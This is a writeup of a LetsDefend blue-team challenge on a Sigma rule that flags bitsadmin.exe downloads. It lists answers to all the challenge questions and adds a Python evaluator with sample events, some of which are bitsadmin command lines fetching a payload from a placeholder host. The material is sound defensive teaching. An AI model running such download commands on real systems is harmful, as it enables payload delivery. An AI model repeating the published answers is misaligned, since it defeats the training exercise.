
(Writeup) LetsDefend Challenge - Learn Sigma


Welcome!

  • LetsDefend is a Blue Team Training platform.
  • This writeup covers a challenge on LetsDefend.

Challenge Details:

  • Role targeted: Security Analyst
  • Skill Level: Beginner

Description:

Your organization has detected a ransomware infection on one of its critical systems, and it is imperative that you address this issue immediately. This type of malware searches for valuable files, such as sensitive documents and configuration files, and encrypts them using a strong encryption algorithm.

The investigation has revealed that the ransomware may have used the Windows utility bitsadmin.exe to download additional malicious payloads or communicate with its command-and-control (C2) server.

Your task is to carefully review the Sigma rule, answer the related questions, and understand how different rule sections (selection, condition, fields, tags, logsource) work together to detect malicious activity.

File Location: C:\Users\LetsDefend\Desktop\ChallengeFile\proc_creation_win_bitsadmin_download.yml


Lab Start:

We were already given the file location. As soon as the VM opens, we can open the YAML file in Notepad++.

Oh, it’s surprisingly short. Let’s answer the questions.


Questions:

  1. Which executable file was specifically targeted by this Sigma rule?
    • We can find this under: detection -> selection_img -> OriginalFileName
      • Answer: bitsadmin.exe
  2. What command-line option is used to indicate a file transfer in this rule?
    • The word “transfer” gives it away. Line 26.
      • Answer: /transfer
  3. What logical expression in the condition field combined the criteria to trigger this rule?
    • The question itself names the condition field. Line 33.
      • Answer: selection_img and (selection_cmd or all of selection_cli_*)
  4. Which specific field did this rule capture that shows the command being executed?
    • The “fields” section is where to look. Lines 34-36.
      • Answer: CommandLine
  5. Which single ATT&CK tactic tag is listed first in this rule?
    • Tags on lines 12-17, first one on line 13.
      • Answer: attack.defense-evasion
  6. What is the primary category of events that this Sigma rule was written to monitor?
    • “category” keyword. Line 19.
      • Answer: process_creation
  7. What specific command-line argument did this rule look for to identify HTTP-based downloads?
    • A quick scan for “HTTP” lands on line 32.
      • Answer: http
  8. Which command-line option must be present to create a new transfer using bitsadmin?
    • Keyword “create”. Line 29.
      • Answer: /create
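To see how the logsource, selection, condition and fields sections of a rule like this one actually work together, here is a small evaluator added for this writeup; it is not part of the challenge file or of the original post. The rule dict reconstructs the layout the questions above describe (selection_img on Image/OriginalFileName, selection_cmd on /transfer, selection_cli_* on /create and http, the same condition string, fields = CommandLine), but its exact strings, the EventCategory routing field and the sample process-creation events are assumptions constructed for the example, not the challenge's YAML:

```python
import fnmatch
import re

# Constructed example rule mirroring the layout the writeup describes for the challenge's
# bitsadmin rule, rebuilt as a Python dict so it runs without PyYAML. Strings are assumptions.
RULE = {
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": [  # a list of maps is OR-ed
            {"Image|endswith": "\\bitsadmin.exe"},
            {"OriginalFileName": "bitsadmin.exe"},
        ],
        "selection_cmd": {"CommandLine|contains": " /transfer "},
        "selection_cli_1": {"CommandLine|contains": " /create "},
        "selection_cli_2": {"CommandLine|contains": "http"},
        "condition": "selection_img and (selection_cmd or all of selection_cli_*)",
    },
    "fields": ["CommandLine"],
    "tags": ["attack.defense-evasion"],
}

# Sigma string matching is case-insensitive; the modifier is the part after '|' in a key.
_MODIFIERS = {"": lambda v, p: v == p, "contains": lambda v, p: p in v,
              "startswith": lambda v, p: v.startswith(p), "endswith": lambda v, p: v.endswith(p)}

def _selection_matches(selection, event):
    """List of maps = OR; keys inside one map = AND; a list of values under a key = OR."""
    if isinstance(selection, list):
        return any(_selection_matches(item, event) for item in selection)
    for key, pattern in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        patterns = pattern if isinstance(pattern, list) else [pattern]
        if value is None or not any(_MODIFIERS[modifier](str(value).lower(), str(p).lower())
                                    for p in patterns):
            return False
    return True

def evaluate_condition(condition, results):
    """Evaluate and/or, parentheses and 'all of'/'1 of' wildcard quantifiers over a dict of
    selection_name -> bool. 'and' binds tighter than 'or', as in Sigma."""
    tokens = re.findall(r"\(|\)|[^\s()]+", condition)

    def peek():
        return tokens[0] if tokens else None

    def parse_chain(op, operand, combine):  # left-assoc chain; the rhs is always consumed
        value = operand()
        while peek() == op:
            tokens.pop(0)
            value = combine(value, operand())
        return value

    def parse_atom():
        token = tokens.pop(0)
        if token == "(":
            value = parse_or()
            if tokens.pop(0) != ")":
                raise ValueError("unbalanced parentheses in condition")
            return value
        if token in ("all", "1", "any") and peek() == "of":
            tokens.pop(0)
            names = fnmatch.filter(results, tokens.pop(0))  # selection_cli_* -> _1, _2
            if not names:
                raise ValueError("quantifier matched no selection")
            return (all if token == "all" else any)(results[n] for n in names)
        return results[token]  # KeyError if the condition names an undefined selection

    def parse_and():
        return parse_chain("and", parse_atom, lambda a, b: a and b)

    def parse_or():
        return parse_chain("or", parse_and, lambda a, b: a or b)

    return parse_or()

def rule_matches(rule, event):
    """logsource decides which events are considered at all; condition combines selections."""
    if event.get("EventCategory") != rule["logsource"]["category"]:
        return False
    detection = rule["detection"]
    results = {k: _selection_matches(v, event) for k, v in detection.items() if k != "condition"}
    return evaluate_condition(detection["condition"], results)

def evaluate_events(rule, events):
    """Each alert carries only the rule's 'fields', the columns an analyst is shown first."""
    return [{f: e.get(f) for f in rule["fields"]} for e in events if rule_matches(rule, e)]

# Constructed events; EventCategory stands in for log-source routing, example.invalid is reserved.
SAMPLE_EVENTS = [
    {"EventCategory": "process_creation", "Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 http://example.invalid/p.bin C:\Users\Public\p.bin"},
    {"EventCategory": "process_creation", "Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /create /download job2 http://example.invalid/x"},  # all of selection_cli_*
    {"EventCategory": "process_creation", "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c echo /transfer http"},  # right keywords, wrong image, no alert
    {"EventCategory": "process_creation", "Image": r"C:\Users\Public\svc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "svc.exe /transfer job3 http://example.invalid/a C:\\a.bin"},  # renamed copy, caught by OriginalFileName
]
```

Calling `evaluate_events(RULE, SAMPLE_EVENTS)` returns three alerts, each reduced to the CommandLine field: the /transfer job, the /create plus http job (the only path through `all of selection_cli_*`), and the renamed copy, which slips past the Image check but not OriginalFileName (Sysmon reads that from the PE version resource, not the file name on disk). The cmd.exe event carries both keywords yet never alerts, because selection_img is AND-ed with everything else, which is exactly the structure the condition question is pointing at; an event from another logsource category is dropped before any selection is evaluated.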
Author: Reed Eggleston
B.S. in Cybersecurity | SSCP | CySA+ | PenTest+ | Project+